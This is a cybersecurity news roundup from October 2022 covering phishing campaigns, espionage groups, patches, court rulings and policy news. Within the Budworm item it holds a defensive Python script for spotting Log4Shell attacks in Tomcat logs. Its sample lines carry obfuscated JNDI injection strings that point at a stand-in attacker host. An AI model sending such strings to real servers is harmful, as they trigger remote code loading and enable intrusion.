At a glance.
- Annual SOC Performance Report is out.
- Burnout as a security issue.
- Caffeine phishing.
- The work of the CISO after the Uber verdict.
- Research on the Budworm espionage group.
- County election workers targets of phishing.
- Google Translate spoofed for credential harvesting.
- CISA and FBI publish advisory on foreign election influence operations.
- Starlink service interruptions reported.
- Reports: Germany's cybersecurity chief faces scrutiny over alleged ties to Russia.
- Renewed activity by Polonium.
- Emotet ups its game.
- COVID-19 small business grants as phishbait.
- Impersonating Intrusion Truth.
- LDS Church discloses data compromise (possibly related to espionage).
Annual SOC Performance Report is out.
Devo’s annual SOC Performance Report was released Tuesday, surveying professionals about the state of the SOC. 77% of respondents believe that their SOC is “essential” or “very important” to their company’s cybersecurity strategy. The minority who believed their SOC fell short cited lack of visibility into the attack surface and difficulties hiring and retaining skilled employees as the root problems. Cyber risk compliance, threat detection, and incident response and remediation were the most prominent SOC services delivered currently. Threat hunting and cloud-native capabilities were the top two services SOCs planned to add within the year. For more on the state of the Security Operations Center, see CyberWire Pro.
Burnout as a security issue.
Tessian Tuesday morning blogged the results of a study of overworked CISOs, and how fatigue and burnout pose a security risk. The study found that CISOs are working significant amounts of overtime, upwards of two extra days a week. This amounts on average to 16.5 extra hours a week, an increase of eleven hours over the past year. Three quarters of CISOs report difficulty “switching off” from work. Burnout seems correlated with the size of the organization. Considering just one threat, phishing, the respondents cited distraction as the reason they failed to detect a scam. (A separate survey by Forrester found that security teams can spend up to 600 hours per month on threats caused by human error.) More on CISO performance may be found at CyberWire Pro.
Caffeine phishing.
Mandiant describes a phishing-as-a-service (PhaaS) platform called “Caffeine,” which is surprisingly accessible and available to anyone on the Internet who knows the URL for its website. It's easy to use, and, unusually, it also offers templates suitable for use against Russian and Chinese targets. Mandiant's researchers add that Caffeine’s developers are actively working to expand its capabilities. For more information, see CyberWire Pro.
The work of the CISO after the Uber verdict.
The case of Joe Sullivan, Uber’s former security chief convicted for his attempt to cover up a 2016 hack, has affected the security community, specifically, C-suite security professionals. The Record by Recorded Future reports that some CISOs are beginning to fear “CISO scapegoating.” But Security InfoWatch argues that CSOs are in this position every day, and that the Uber verdict simply highlights an enduring feature of their job. For more on the state of the CISO, see CyberWire Pro.
Research on the Budworm espionage group.
The Symantec Threat Hunter Team, part of Broadcom Software, Thursday released research on the Budworm cyberespionage group. Budworm has recently been observed targeting a Middle Eastern government, a multinational electronics manufacturer, a US state legislature, and a hospital in Southeast Asia. The group exploits Log4j vulnerabilities to compromise Apache Tomcat servers and install web shells. Budworm makes extensive use of HyperBro malware, often installed through dynamic-link library (DLL) side-loading; the group has also been seen using a legitimate CyberArk Viewfinity executable (an endpoint privilege management tool) as the side-loading host. The group has historically hit Asia, the Middle East, and Europe, but has now been linked to an attack on a US target. A shift toward US targets could mean a directional change for the group. For more on Budworm, see CyberWire Pro.
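The initial-access technique described above is Log4Shell-style exploitation of Tomcat, and the cheapest place to look for it is the Tomcat access log. The script below is an added example written for this briefing; it is not Symantec's code or anything from the research it summarizes. It scans constructed access-log lines (not real traffic) for `${jndi:...}` lookups, first URL-decoding the request and flattening the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:X:-j}`) that attackers use to dodge naive string matching, and reports the client, scheme and callback target for each hit. The log format, sample addresses and field positions are assumptions.

```python
"""Scan Tomcat access-log lines for Log4Shell-style JNDI lookup strings,
including the URL-encoded and nested-lookup obfuscations seen in the wild.
Added example for this briefing; not code from Symantec or the page."""
import re
import urllib.parse

# Constructed sample lines (not real traffic) in Tomcat's "common" format;
# the third line carries the payload in the User-Agent field instead of the URL.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2022:09:14:02 +0000] "GET /manager/html HTTP/1.1" 200 1532
10.0.0.9 - - [12/Oct/2022:09:14:07 +0000] "GET /app/?x=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2022:09:14:09 +0000] "GET /app/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.7:1099/b}"
10.0.0.9 - - [12/Oct/2022:09:14:11 +0000] "GET /app/?q=%24%7Bjndi%3Adns%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 404 203
10.0.0.11 - - [12/Oct/2022:09:14:15 +0000] "GET /index.jsp HTTP/1.1" 200 4096
"""

# Innermost ${...} lookup: contains no nested braces.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A de-obfuscated JNDI lookup: scheme, optional "//", then the target up to "}".
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^}\s]*)", re.IGNORECASE)


def _resolve(match):
    """Collapse one obfuscating lookup (${lower:j}, ${::-j}, ${env:X:-j})
    to its literal result; leave a real jndi: lookup untouched."""
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)
    if ":-" in body:                      # default-value form: ${x:-j} -> j
        return body.rsplit(":-", 1)[1]
    for prefix in ("lower:", "upper:"):   # case-mapping form: ${lower:j} -> j
        if low.startswith(prefix):
            return body[len(prefix):]
    return match.group(0)                 # unknown lookup: keep as-is


def normalize(s):
    """URL-decode (repeatedly, bounded) and flatten nested lookups until stable."""
    for _ in range(3):
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:                      # terminates: each pass removes lookups or changes nothing
        prev = s
        s = INNER_LOOKUP.sub(_resolve, s)
    return s.lower()


def scan_access_log(text):
    """Return one finding (dict) per log line that contains a JNDI lookup."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            findings.append({
                "line": line_no,
                "client": line.split(" ", 1)[0],   # first field: remote address
                "scheme": m.group(1),
                "target": m.group(2),
                "raw": line,
            })
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} -> jndi:{hit['scheme']} {hit['target']}")
```

The callback target is the useful pivot: it is the attacker-controlled LDAP/RMI/DNS host, so a hit should be followed by a search of outbound connection logs from the Tomcat host to that address, and by a check of the webapp directories for newly written JSP files, since the page reports web shells as the next step.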
County election workers targets of phishing.
Researchers at Trellix have observed a spike in phishing emails targeting county election workers in Pennsylvania and Arizona ahead of the states’ upcoming midterm elections. The emails are attempting to steal credentials or trick the user into downloading malware. The researchers note that an attacker could use this access to achieve several goals: election interference, collection of political intelligence, or conventional cybercriminal profit-taking through sale of stolen credentials. For more on election interference, see CyberWire Pro.
Google Translate spoofed for credential harvesting.
Researchers at Avanan describe phishing emails that are impersonating Google Translate in order to steal users’ email credentials. The emails inform users that they have pending incoming emails, and they’ll need to confirm their account within 48 hours in order to receive the emails. If the user clicks the link in the emails, they’ll be taken to a phony Google Translate page with a login field. For more information on this phishing expedition, see CyberWire Pro.
CISA and FBI publish advisory on foreign election influence operations.
Late last week the US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a public service announcement on the sorts of foreign influence operations to be expected during the current US midterm election cycle. "Foreign actors can use a number of methods to knowingly spread and amplify false claims and narratives about malicious cyber activity, voting processes, and results surrounding the midterm election cycle."
Starlink service interruptions reported.
Ukrainian forces are said to have encountered disruption of Starlink service as they advanced into formerly Russian-occupied territory, the Financial Times reported Friday. No cause for the outages has been publicly established, but there has been speculation that SpaceX restricted service in those areas to deny it to Russian operators, and that it hadn't kept pace with Ukraine's advances. For now, the reported outages remain under investigation.
Reports: Germany's cybersecurity chief faces scrutiny over alleged ties to Russia.
Reuters reports that Arne Schoenbohm, president of the Bundesamt für Sicherheit in der Informationstechnik (BSI), Germany's federal information security agency, is under scrutiny for contacts with Russia he may have developed through his participation in the Cyber Security Council of Germany. Interior Minister Nancy Faeser is said to be seeking his dismissal. The story is still developing.
Renewed activity by Polonium.
ESET researchers outline recent activity against Israeli targets by Polonium, a threat actor that operates from Lebanon under the control of Iran's Ministry of Intelligence and Security (MOIS). Polonium is a cyberespionage operation that specializes in backdooring its targets to extract information and maintain persistence.
Emotet ups its game.
ESET researchers tweeted Wednesday that the criminal operators of Emotet have been improving their product's "systeminfo module, with changes that enable malware operators to improve the targeting of specific victims and distinguish tracking bots from real users." They've also changed the system attributes Emotet collects and reports back to its command-and-control: "The new list includes processor brand, size of physical memory in MB and an approximate % of it being in use."
COVID-19 small business grants as phishbait.
INKY has published a report on the use of small business grants as phishing lures. Scammers are impersonating the US Small Business Administration (SBA) to distribute phony grant applications hosted on Google Forms. The SBA has stopped accepting applications for COVID-19 relief, but the scammers are counting on their victims' having overlooked that. The Google Form asks the user to submit their personal and financial information, including their social security number, driver's license details, and bank account information. The usual marks of a scam are present (typographical errors, nonstandard grammar and usage) as well as Google's "Report Abuse" button and its customary warning, "Never submit passwords through Google Forms.” These last two don't normally find their way into phishing scams.
Impersonating Intrusion Truth.
Researcher Dominic Alvieri tweeted that an unknown group is impersonating Intrusion Truth in an attempt to misidentify APT41, the Chinese threat actor that carries out state-directed operations while engaging in the occasional for-profit side hustle, as an NSA operation. It's not convincing: whatever mystery still surrounds APT41 (also known as Wicked Panda), the group is not NSA, and you can read all about it in, among other places, the FBI's wanted poster. Intrusion Truth is an anonymous, so-far unattributed group that for several years has devoted itself to outing Chinese cyber operators.
LDS Church discloses data compromise (possibly related to espionage).
The Church of Jesus Christ of Latter-day Saints Thursday disclosed that it had detected, in March, "unauthorized activity in certain computer systems that affected personal data of some Church members, employees, contractors, and friends." The disclosure was delayed until this week at the request of law enforcement, who asked for the information to be held to protect the integrity of the investigation. It's not publicly known who was responsible for the intrusion, but the church's statement says "U.S federal law enforcement authorities suspect that this intrusion was part of a pattern of state-sponsored cyberattacks aimed at organizations and governments around the world that are not intended to cause harm to individuals."
Patch news.
On this month’s Patch Tuesday, many vendors announced security patches for vulnerabilities. Microsoft announced eighty-five patches, Adobe twenty-six, and according to Onapsis, SAP issued twenty-three. And the US Cybersecurity and Infrastructure Security Agency (CISA) added one new vulnerability to its Known Exploited Vulnerabilities Catalog. For a more comprehensive overview of Patch Tuesday, see CyberWire Pro.
CISA released three industrial control system (ICS) advisories, for Altair HyperView Player, Daikin SVMPC1 and SVMPC2, and Sensormatic Electronics C-CURE 9000.
CISA also issued an unusually large number of industrial control system (ICS) advisories on Thursday. They cover issues in Siemens LOGO!, Siemens Industrial Edge Management, Siemens Solid Edge, Siemens SIMATIC S7-1200 and S7-1500 CPU Families, Hitachi Energy Lumada Asset Performance Management Prognostic Model Executor Service, Siemens Desigo PXM Devices Webserver, Siemens Nucleus RTOS FTP Server, Siemens TCP Event Service of SCALANCE and RUGGEDCOM Devices, Siemens SICAM P850 and P855 Devices, Siemens JT Open Toolkit and Simcenter Femap, Siemens SCALANCE and RUGGEDCOM Products, Siemens APOGEE, TALON and Desigo PXC/PXM Products, Siemens LOGO! 8 BM Devices, Siemens SIMATIC HMI Panels, Siemens SCALANCE X-200 and X-200IRT Families, Siemens Desigo CC and Cerberus DMS, Mitsubishi Electric MELSEC iQ-R Series (Update A), Mitsubishi Electric MELSEC iQ-R Series (Update A), Siemens PROFINET Stack Integrated on Interniche Stack (Update D), Siemens SINEC NMS (Update A), Siemens SCALANCE (Update A), Siemens SCALANCE W1750D (Update A), Siemens Apache HTTP Server (Update A), Siemens OpenSSL Affected Industrial Products (Update D), and Siemens Industrial Products with OPC UA (Update C).
Crime and punishment.
ArtNet reports that five scammers between the ages of 18 and 24 were indicted in Paris Wednesday for a crypto phishing scam. The scammers are accused of selling and reselling $2.5 million worth of NFTs from at least five victims. Christopher Durand, deputy chief of France’s cyber-crime authority, said that two of the five scammers are charged with manufacturing the scam site, and the other three are charged with advertising and money laundering. The scam operated on the promise of animating "Bored Ape" NFTs.
Courts and torts.
Zoetop, the company behind fast fashion retail giants Shein and Romwe, has been ordered to pay the US state of New York $1.9 million for a breach that exposed the data of over 40 million customers, 800,000 of whom were New York residents. As the Verge recounts, in 2018 a hacker stole credit card and personal customer information from Zoetop’s systems, including names, email addresses, and hashed passwords. The charges allege that Zoetop failed to protect customers’ data, neglected to properly inform customers of the breach, and tried to hide details about the scope of the incident. The Office of the Attorney General (OAG) conducted an investigation into the breach and found that Zoetop contacted only a portion of the affected customers and failed to reset passwords for any of the accounts. It wasn’t until two years later, when Zoetop discovered stolen customer login information on the dark web, that the company informed customers of the breach and reset their account credentials. The company is also accused of misrepresenting the number of victims and claiming there was no evidence that credit card information was stolen. OAG also says Zoetop used inadequate password management systems and failed to monitor for security issues or establish a comprehensive attack response plan.
The Telegraph reports that far-right media personality Alex Jones has been ordered to pay $965 million in damages to the families of victims of the 2012 Sandy Hook shooting, for his claims that it was a hoax. Attorney Chris Mattei said, "The families suffered a decade-long campaign of harassment and death threats by Mr Jones’ many millions of followers." Jones' false claims included stories that the families were "crisis actors," and that the attack was part of a government plot to take away Americans' guns.
Policies, procurements, and agency equities.
Last Friday US President Joe Biden issued an executive order codifying Privacy Shield 2.0, an agreement established earlier this year regarding how the EU and the US share individuals’ private data. “Transatlantic data flows are critical to enabling the $7.1 trillion EU-US economic relationship,” the White House stated. Indeed, this transfer of data is essential, but the EU has expressed concerns that the US has too much access to European data, and the Schrems II case highlighted the fact that EU citizens had no rights to petition the US government over issues concerning data collection. As Computing explains, in July 2020 the Court of Justice of the European Union (CJEU) ruled that, under EU law, the prior EU-US Privacy Shield framework was not a valid data transfer mechanism because it gave the US excessive freedom to monitor European data.
With the intent of assuaging the EU’s concerns, Biden’s EO establishes the Data Protection Review Court, which will give EU citizens the opportunity to challenge how US security agencies use their data. It also sets several restrictions on data collection, stating that any intelligence data gathering must be “proportionate” and that only very specific types of data can be collected. However, as the Register notes, critics argue the EO is unlikely to satisfy EU law. Austrian privacy activist Max Schrems commented, "In the end, the CJEU's definition will prevail, likely killing any EU decision again. The European Commission is again turning a blind eye on US law, to allow continued spying on Europeans.” Ursula Pachl, deputy director general of the European Consumer Organization, told Wired, “However much the US authorities try to paper over the cracks of the original Privacy Shield, the reality is that the EU and US still have a different approach to data protection which cannot be canceled out by an executive order.” The EO will now be sent to Brussels, where EU officials have up to six months to review it. A new data agreement is expected around March 2023, although it’s anticipated that privacy advocates will challenge the decision in court.
In a bipartisan decision, the US Senate Homeland Security Committee has approved the Securing Open Source Software Act of 2022, legislation that calls on the Cybersecurity and Infrastructure Security Agency (CISA) to create a “risk framework” for the use of open source code within the federal government and critical infrastructure. Prompted by the infamous Log4j vulnerability, the draft act requires CISA to hire experts who are able to identify and remediate vulnerabilities in open source code, and open source software in use would be continuously monitored and checked by CISA. The act also directs some agencies to create in-house open source programs.
Starlink founder Elon Musk tweeted last week that "This operation [providing Starlink service to Ukraine] has cost SpaceX $80M & will exceed $100M by end of year." CNN now reports that Starlink has said it can no longer bear the cost, out-of-pocket, of delivering resilient Internet service to Ukraine. The company has asked the US Department of Defense for funding. “We are not in a position to further donate terminals to Ukraine, or fund the existing terminals for an indefinite period of time,” SpaceX’s director of government sales wrote to the Department.